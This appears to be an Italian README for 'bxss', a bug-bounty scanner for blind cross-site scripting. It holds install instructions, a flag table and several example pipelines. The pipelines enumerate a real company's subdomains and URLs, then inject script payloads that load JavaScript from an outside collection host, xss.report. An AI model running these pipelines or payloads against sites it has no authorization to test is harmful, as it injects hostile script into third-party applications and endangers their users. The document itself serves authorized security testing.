
Blind XSS Scanner è uno strumento che può essere utilizzato per scansionare vulnerabilità XSS cieche nelle applicazioni web.
Bxss è uno scanner XSS Blind ad alte prestazioni che automatizza il rilevamento di vulnerabilità XSS blind nelle applicazioni web.
Stiamo lavorando attivamente all'integrazione di un pool di worker basato su Chromium per migliorare le prestazioni di bxss su dispositivi con basse specifiche.
Questa funzionalità permetterà di delegare compiti onerosi, come il rilevamento XSS basato su DOM o l'ispezione dei payload dopo l'attivazione, a istanze Chromium leggere gestite tramite un pool. Distribuendo il carico di lavoro su più contesti di browser headless in modo controllato ed efficiente, bxss rimarrà reattivo e utilizzabile anche su macchine con specifiche ridotte.
Questo renderà bxss non solo potente ma anche altamente accessibile, indipendentemente dai vincoli di sistema.
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
La modalità Trace è una funzionalità sperimentale che permette di tracciare dove il BlindXSS è stato attivato. Alcune piattaforme BlindXSS di terze parti, come https://xss.report/, consentono di specificare parametri personalizzati nei tuoi payload, permettendo di tracciare dove il BlindXSS è stato attivato. Ad esempio, se specifichi il parametro url=https://somehost.com nel tuo payload, lo strumento utilizzerà il payload
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'
per i test e, al momento dell'attivazione, potrai ispezionare il DOM e vedere da quale host il BlindXSS è stato attivato.
Assicurati, quando assegni parametri personalizzati nella tua dashboard, di assegnare url={LINK} in modo che bxss possa sostituire automaticamente {LINK} con l'URL effettivo.
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t \
-rl 10
Per dorking avanzato ed esplorazione di vulnerabilità, dai un'occhiata a Dorki e iscriviti oggi!
Se ottieni una ricompensa usando questo strumento, considera di supportarmi offrendomi un caffè!
| Argomento | Descrizione | Predefinito |
|---|
-a | Aggiunge il payload al parametro | false |
-c int | Imposta il livello di concorrenza | 30 |
-H string | Imposta un header personalizzato | "" |
-hf string | Percorso del file con gli header | "" |
-p string | Il payload XSS blind | "" |
-pf string | Percorso del file con i payload | "" |
-t | Testa i parametri per XSS blind | false |
-X string | Metodo HTTP da utilizzare | "" |
-v | Abilita modalità debug | false |
-rl float | Limite di velocità (richieste al secondo) | 0 |
-f | Segui i redirect | false |
-l | Abilita la modalità Trace (sperimentale) | false |